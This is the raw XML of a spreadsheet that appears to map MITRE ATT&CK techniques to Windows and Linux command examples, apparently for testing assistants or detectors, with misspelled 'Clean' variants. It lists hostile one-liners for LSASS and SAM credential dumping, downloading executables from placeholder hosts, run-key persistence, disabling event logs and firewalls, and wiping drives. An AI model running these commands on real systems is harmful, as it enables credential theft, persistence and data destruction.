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repos\AssistantsTesterGithub\MiTRE\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E01595F2-870B-4CA7-9BFA-C628286A3F1E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ImplementedOperations" sheetId="2" r:id="rId1"/>
    <sheet name="Operation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2" i="2" l="1"/>
  <c r="E163" i="2"/>
  <c r="E164" i="2"/>
  <c r="E165" i="2"/>
  <c r="E166" i="2"/>
  <c r="E167" i="2"/>
  <c r="E168" i="2"/>
  <c r="E169" i="2"/>
  <c r="E170" i="2"/>
  <c r="D19" i="1"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="465" uniqueCount="303">
  <si>
    <t>Operation</t>
  </si>
  <si>
    <t>Technique</t>
  </si>
  <si>
    <t>Link</t>
  </si>
  <si>
    <t>Exec</t>
  </si>
  <si>
    <t>Type</t>
  </si>
  <si>
    <t>OS</t>
  </si>
  <si>
    <t>Language</t>
  </si>
  <si>
    <t>Obs</t>
  </si>
  <si>
    <t>Win</t>
  </si>
  <si>
    <t>Compiled</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">CreateProcessA(…, cmd.exe,...) ; CreatePipe(…); WriteFile(pipeHandle, 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>,…);</t>
    </r>
  </si>
  <si>
    <r>
      <t>fork and execl("/bin/sh", "sh", "-c", "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 xml:space="preserve">", NULL); </t>
    </r>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>ShellExecuteA</t>
  </si>
  <si>
    <t>CreateProcess</t>
  </si>
  <si>
    <t>3.1.1</t>
  </si>
  <si>
    <t>3.1.2</t>
  </si>
  <si>
    <t>3.2.1</t>
  </si>
  <si>
    <t>3.2.2</t>
  </si>
  <si>
    <t>Cmd line</t>
  </si>
  <si>
    <t>Cmd line &amp; pipe send command</t>
  </si>
  <si>
    <t>Command inside bash</t>
  </si>
  <si>
    <t>Command inside batch</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">pipe(...); fork();  execl("/bin/sh", "sh", "-c", NULL); write(pipe[1], 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>, …);</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fopen("command.bat","w"); fprintf(file, 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>); CreateProcessA(…, "cmd /c command.bat",...);</t>
    </r>
  </si>
  <si>
    <r>
      <t>CreateProcessA(NULL, (LPSTR)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>, ...);</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ShellExecuteA(NULL,"open", "cmd.exe", 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>, NULL, SW_HIDE );</t>
    </r>
  </si>
  <si>
    <r>
      <t>CreateProcessA(NULL, (LPSTR)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>cmd / c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>, ...);</t>
    </r>
  </si>
  <si>
    <t>WinExec</t>
  </si>
  <si>
    <r>
      <t>WinExec(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>);</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">NtCreateThreadEx </t>
  </si>
  <si>
    <t>NtCreateProcessEx</t>
  </si>
  <si>
    <r>
      <t>GetModule("ntdll.dll"); GetProcAddress("NtCreateThreadEx"); CreateProcess(</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>COMMAND</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>[0],...);</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">GetProcAddress("NtCreateProcessEx"); NtCreateProcessEx(); WriteProcessMemory(…, </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>COMMAND</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>,...);</t>
    </r>
  </si>
  <si>
    <t>wmic</t>
  </si>
  <si>
    <t>MSHTA</t>
  </si>
  <si>
    <t>sc</t>
  </si>
  <si>
    <t>schtasks</t>
  </si>
  <si>
    <t>wmic process call create "cmd.exe /c calc"</t>
  </si>
  <si>
    <t>mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run(""calc"",0)(window.close)")</t>
  </si>
  <si>
    <t>sc create MyService binPath= "cmd.exe /c calc"</t>
  </si>
  <si>
    <t>schtasks /create /tn MyTask /tr "cmd.exe /c calc" /sc once /st 00:00</t>
  </si>
  <si>
    <t>powershell</t>
  </si>
  <si>
    <t>CrossPlatform</t>
  </si>
  <si>
    <t>"powershell -Command \"Start-Process calc.exe -ArgumentList '0', '1', '0'\"";</t>
  </si>
  <si>
    <t>powershell -Command "&amp; { calc.exe 0 1 0 }"</t>
  </si>
  <si>
    <t>powershell -Command "Invoke-Expression 'calc.exe 0 1 0'"</t>
  </si>
  <si>
    <t>powershell -ExecutionPolicy Bypass -Command "calc.exe 0 1 0"</t>
  </si>
  <si>
    <t>cmd /c "powershell -Command calc.exe 0 1 0"</t>
  </si>
  <si>
    <t>powershell -EncodedCommand YwBhAGwAYwAuAGUAeABlACAAMAAuADEALgAwAA==</t>
  </si>
  <si>
    <t>powershell -Command "calc.exe 0 1 0; Write-Host 'Calculator started'"</t>
  </si>
  <si>
    <t>python</t>
  </si>
  <si>
    <t>java</t>
  </si>
  <si>
    <t>script</t>
  </si>
  <si>
    <t>JavaBytes</t>
  </si>
  <si>
    <t>Registry</t>
  </si>
  <si>
    <t>API</t>
  </si>
  <si>
    <t>RegOpenKeyExA</t>
  </si>
  <si>
    <t>RegQueryValueExA</t>
  </si>
  <si>
    <t>reg query HKLM\SECURITY\Policy\Secrets /s</t>
  </si>
  <si>
    <t>Get-Item -Path "HKLM:\SECURITY\Policy\Secrets"</t>
  </si>
  <si>
    <t>Invoke-Expression "Get-Item -Path 'HKLM:\SECURITY\Policy\Secrets'"</t>
  </si>
  <si>
    <t>cmd</t>
  </si>
  <si>
    <t>wmi</t>
  </si>
  <si>
    <t>Get-WmiObject -Query "SELECT * FROM StdRegProv WHERE Hive='HKEY_LOCAL_MACHINE' AND Key='SECURITY\\Policy\\Secrets'"</t>
  </si>
  <si>
    <t>C++</t>
  </si>
  <si>
    <t xml:space="preserve">LoadLibrary("ntdll.dll");NtOpenKey(); </t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/001/</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>3x Execute</t>
  </si>
  <si>
    <t>ExecCount</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>Open process + 2x Execute</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/002/</t>
  </si>
  <si>
    <t>OS Credential Dumping: Security Account Manager</t>
  </si>
  <si>
    <t>"procdump -ma lsass.exe lsass_dump"</t>
  </si>
  <si>
    <t>"rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full"</t>
  </si>
  <si>
    <t>"reg save HKLM\\sam sam"</t>
  </si>
  <si>
    <t>"reg save HKLM\\system system"</t>
  </si>
  <si>
    <t>"pwdumpx.exe &gt; credentials.txt"</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>OS Credential Dumping: NTDS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/003/</t>
  </si>
  <si>
    <t>1 Execute</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>1 Registry</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSA Secrets</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/004/</t>
  </si>
  <si>
    <t>T1010.000</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1010/</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1053/005/</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Scheduled Task</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Execution, Persistence, Privilege Escalation,</t>
  </si>
  <si>
    <t>1 execute</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1056/001/</t>
  </si>
  <si>
    <t>Input Capture: Keylogging</t>
  </si>
  <si>
    <t>Collection, Credential Access</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1059/001/</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter: PowerShell</t>
  </si>
  <si>
    <t>PWSH  -exec ??</t>
  </si>
  <si>
    <t>T1082.000</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1082/</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>T1083.000</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1083/</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>T1091.000</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1091/</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>Lateral Movement, Initial Access</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1105/</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>T1105.000</t>
  </si>
  <si>
    <t>T1106.000</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1106/</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1113/</t>
  </si>
  <si>
    <t>T1113.000</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>T1124.000</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1124/</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Data Encoding: Standard Encoding</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/001/</t>
  </si>
  <si>
    <t>Data Encoding: Non-Standard Encoding</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1132/002/</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1136/001/</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>Create Account: Local Account</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216/001/</t>
  </si>
  <si>
    <t>System Script Proxy Execution: PubPrn</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>T1216.002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1216/002/</t>
  </si>
  <si>
    <t>T1489.000</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1489/</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/001/</t>
  </si>
  <si>
    <t>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/002/</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/004/</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1547/003/</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1561/002/</t>
  </si>
  <si>
    <t>Disk Wipe: Disk Structure Wipe</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/002/</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Windows Event Logging</t>
  </si>
  <si>
    <t>3 registry, 3 exec</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/004/</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify System Firewall</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/001/</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Files and Directories</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1564/003/</t>
  </si>
  <si>
    <t>Hide Artifacts: Hidden Window</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1614/001/</t>
  </si>
  <si>
    <t>T1614.001</t>
  </si>
  <si>
    <t>1 registry</t>
  </si>
  <si>
    <t>System Location Discovery: System Language Discovery</t>
  </si>
  <si>
    <t>wmic process call create "notepad.exe"</t>
  </si>
  <si>
    <t>T1047.000</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1047/</t>
  </si>
  <si>
    <t>TODO</t>
  </si>
  <si>
    <t>wmic os get Caption,CSDVersion,OSArchitecture</t>
  </si>
  <si>
    <t>Get-WmiObject -Class Win32_OperatingSystem | Select-Object Caption, CSDVersion, OSArchitecture</t>
  </si>
  <si>
    <t>Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe"</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>QUERY: Software\Microsoft\Windows\CurrentVersion\Uninstall</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1012/</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>net user</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1497/001/</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>reg query "HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"</t>
  </si>
  <si>
    <t>dir "C:\Windows\System32\drivers\vmmouse.sys"</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MyApp /t REG_SZ /d "calc.exe" /f</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1112/</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">fopen("command.sh","w"); fprintf(file, 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>); fork and execl</t>
    </r>
  </si>
  <si>
    <t>REG.EXE ADD HKEY_LOCAL_MACHINE\Software\Classes\CLSID\&lt;arbitrary CLSID&gt;\InProcServer32 /V ThreadingModel /T REG_SZ /D Apartment /F</t>
  </si>
  <si>
    <t xml:space="preserve">daca iau date de pe alte articole -&gt; sa pun de unde l-am luat, link-ul articolului lor </t>
  </si>
  <si>
    <t>https://redcanary.com/blog/threat-intelligence/blue-mockingbird-cryptominer/</t>
  </si>
  <si>
    <t>"msadcs.exe \"NTDS.dit\" -s \"SYSTEM\" -p a.txt --users-csv a.csv"</t>
  </si>
  <si>
    <t>"schtasks /create /tn \"abc\" /tr C:\\x.exe /sc ONLOGON /ru \"System\""</t>
  </si>
  <si>
    <t>"ver &gt;&gt; %temp%\\download"</t>
  </si>
  <si>
    <t>"vssadmin list shadows"</t>
  </si>
  <si>
    <t>"curl http:\\www.abc.xyz\\x.exe"</t>
  </si>
  <si>
    <t>"wget http:\\www.abc.xyz\\x.exe"</t>
  </si>
  <si>
    <t>"bitsadmin /create jb1"</t>
  </si>
  <si>
    <t>"bitsadmin /addfile jb1 \"http://www.xyz.com/x.exe\" \"C:\\temp\\x.exe\""</t>
  </si>
  <si>
    <t>"bitsadmin /resume jb1"</t>
  </si>
  <si>
    <t>"bitsadmin / complete jb1"</t>
  </si>
  <si>
    <t>"certutil -urlcache -split -f http://www.xyz.com/x.exe C:\\temp\\x.exe"</t>
  </si>
  <si>
    <t>T1003.001.V1.cpp</t>
  </si>
  <si>
    <t>T1003.004.V1.cpp</t>
  </si>
  <si>
    <t>exec</t>
  </si>
  <si>
    <t>src</t>
  </si>
  <si>
    <t>T1010.000.V1.cpp</t>
  </si>
  <si>
    <t>T1056.001.V1.cpp</t>
  </si>
  <si>
    <t>"powershell.exe Invoke-Command -ScriptBlock { runme.exe }"</t>
  </si>
  <si>
    <t>"powershell.exe Start-Process -FilePath calc.exe"</t>
  </si>
  <si>
    <t>T1082.000.V1.cpp</t>
  </si>
  <si>
    <t>T1082.000.V2.cpp</t>
  </si>
  <si>
    <t>T1105.000.V1.cpp</t>
  </si>
  <si>
    <t>T1106.000.V1.cpp</t>
  </si>
  <si>
    <t>T1113.000.V1.cpp</t>
  </si>
  <si>
    <t>"snippingtool /clip"</t>
  </si>
  <si>
    <t>"net time \\192.168.1.3 /set /yes"</t>
  </si>
  <si>
    <t>T1132.001.V1.cpp</t>
  </si>
  <si>
    <t>T1132.001.V2.cpp</t>
  </si>
  <si>
    <t>"/c net user /add test"</t>
  </si>
  <si>
    <t>"net user /add abc"</t>
  </si>
  <si>
    <t>"cscript.exe C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script \"cmd.exe /c calc.exe\""</t>
  </si>
  <si>
    <t>"wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs \"n; Get-Process | Out-File C:\\Temp\\process_list.txt\""</t>
  </si>
  <si>
    <t>"C:\\Windows\\System32\\net.exe stop MSSQLSERVER"</t>
  </si>
  <si>
    <t>"powershell -Command \"Get-WmiObject-class Win32_NetworkAdapter | ForEach{ If($.NetEnabled) { $.Disable() } }\" &gt; NULL"</t>
  </si>
  <si>
    <t>T1547.001.V1.cpp</t>
  </si>
  <si>
    <t>T1547.001.V2.cpp</t>
  </si>
  <si>
    <t>T1547.001.V3.cpp</t>
  </si>
  <si>
    <t>T1547.001.V4.cpp</t>
  </si>
  <si>
    <t>T1547.002.V1.cpp</t>
  </si>
  <si>
    <t>T1547.003.V1.cpp</t>
  </si>
  <si>
    <t>T1547.004.V1.cpp</t>
  </si>
  <si>
    <t>T1547.004.V2.cpp</t>
  </si>
  <si>
    <t>T1547.004.V3.cpp</t>
  </si>
  <si>
    <t>T1547.004.V4.cpp</t>
  </si>
  <si>
    <t>T1547.004.V5.cpp</t>
  </si>
  <si>
    <t>T1547.004.V6.cpp</t>
  </si>
  <si>
    <t>"del /s /q Y:\\*"</t>
  </si>
  <si>
    <t>"rmdir /s /q D:\\"</t>
  </si>
  <si>
    <t>"format G:"</t>
  </si>
  <si>
    <t>T1562.002.V1.cpp</t>
  </si>
  <si>
    <t>"sc config eventlog start=disabled"</t>
  </si>
  <si>
    <t>T1562.002.V3.cpp</t>
  </si>
  <si>
    <t>T1562.002.V4.cpp</t>
  </si>
  <si>
    <t>T1562.002.V5.cpp</t>
  </si>
  <si>
    <t>"netsh advfirewall firewall add rule name=\"some_rule\" dir=in action=allow protocol=TCP localport=1256 program=\"C:\\x.exe\" description=\"xxx\" enable=yes"</t>
  </si>
  <si>
    <t>"netsh advfirewall firewall delete rule name=\"My Rule\""</t>
  </si>
  <si>
    <t>T1564.001.V1.cpp</t>
  </si>
  <si>
    <t>"attrib +h C:\\temp\\x.exe"</t>
  </si>
  <si>
    <t>"powershell.exe -WindowStyle Hidden a.ps1"</t>
  </si>
  <si>
    <t>T1614.001.V1.cpp</t>
  </si>
  <si>
    <t>T1614.001.V2.cpp</t>
  </si>
  <si>
    <t>T1614.001.V3.cpp</t>
  </si>
  <si>
    <t>"dir \"c:\\Program Files\\\" &gt;&gt; %temp%\\exported_data"</t>
  </si>
  <si>
    <t>T1083.000.V2.cpp</t>
  </si>
  <si>
    <t>"systeminfo.exe /FO LIST"</t>
  </si>
  <si>
    <t>Future ideas, more obfuscation:</t>
  </si>
  <si>
    <t>MSHTA -&gt; obfuscate</t>
  </si>
  <si>
    <t>Approves</t>
  </si>
  <si>
    <t>T1091.000.V1.cpp</t>
  </si>
  <si>
    <t>Summary</t>
  </si>
  <si>
    <t>Clean1003.001</t>
  </si>
  <si>
    <t>clean</t>
  </si>
  <si>
    <t>"rundll32.exe C:\\Windows\\System32\\comsvcs.dll Mini_Dump PID lsass.dmp full"</t>
  </si>
  <si>
    <t>Clean1562.004</t>
  </si>
  <si>
    <t>"netsh advfirewall firewell delete rule name=\"My Rule\""</t>
  </si>
  <si>
    <t>"netsh advfirewall firewall badd rule name=\"some_rule\" dir=in action=allow protocol=TCP localport=1256 program=\"C:\\x.exe\" description=\"xxx\" enable=yes"</t>
  </si>
  <si>
    <t>Clean1136.001</t>
  </si>
  <si>
    <t>"/c net user /ad test"</t>
  </si>
  <si>
    <t>"net user add abc"</t>
  </si>
  <si>
    <t>"procdump ma lsass.exe lsassdump"</t>
  </si>
  <si>
    <t>"procdump -ma lsas.exe lsass_dump"</t>
  </si>
  <si>
    <t>"reg sale HKLM\\sam sam"</t>
  </si>
  <si>
    <t>"reg sav HKLM\\system system"</t>
  </si>
  <si>
    <t>"msadcs.exe \"SOMETHING.dit\" -s \"SYSTEM\" -p a.txt --users-csv a.csv"</t>
  </si>
  <si>
    <t>"netsh advfirewell firewall delete rule name=\"My Rule\""</t>
  </si>
  <si>
    <t>"net user /added abc"</t>
  </si>
  <si>
    <t>"reg save HKLH\\sam sam"</t>
  </si>
  <si>
    <t>"msadcs.exe \"USER.dit\" -s \"SYSTEM\" -p a.txt --users-csv a.csv"</t>
  </si>
  <si>
    <t>"msadcs.exe \"NTDS.dit\" -s \"USER_SYSTEM\" -p a.txt --users-csv a.csv"</t>
  </si>
  <si>
    <t>"powershell -Command \"Fetch-MyWmiObject-class Win32_NetworkAdapter | ForEach{ If($.NetEnabled) { $.Disable() } }\" &gt; NULL"</t>
  </si>
  <si>
    <t>"C:\\Windows\\System32\\net.exe stopp MSSQLSERVER"</t>
  </si>
  <si>
    <t>Clean1003.002</t>
  </si>
  <si>
    <t>Clean1003.003</t>
  </si>
  <si>
    <t>Clean1489.000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</si>
</sst>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3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4" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="3" applyFill="1"/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ttack.mitre.org/techniques/T1106/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/001/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1561/002/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/003/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1489/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/001/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056/001/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/002/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/004/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/002/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/001/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216/002/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/001/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/001/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1091/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/003/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1012/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1010/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1124/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/002/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/004/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/threat-intelligence/blue-mockingbird-cryptominer/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1083/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216/001/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1614/001/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/004/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1113/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/001/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1562/002/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/003/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1112/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/00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27B1-CCD6-45EF-95C0-ACBE31171D5D}">
  <dimension ref="A1:P173"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A103" zoomScale="205" zoomScaleNormal="205" workbookViewId="0">
      <selection activeCell="F107" sqref="F107"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="14" customWidth="1"/>
    <col min="2" max="2" width="9.28515625" customWidth="1"/>
    <col min="3" max="3" width="10.5703125" customWidth="1"/>
    <col min="4" max="5" width="12.5703125" customWidth="1"/>
    <col min="6" max="6" width="31.7109375" customWidth="1"/>
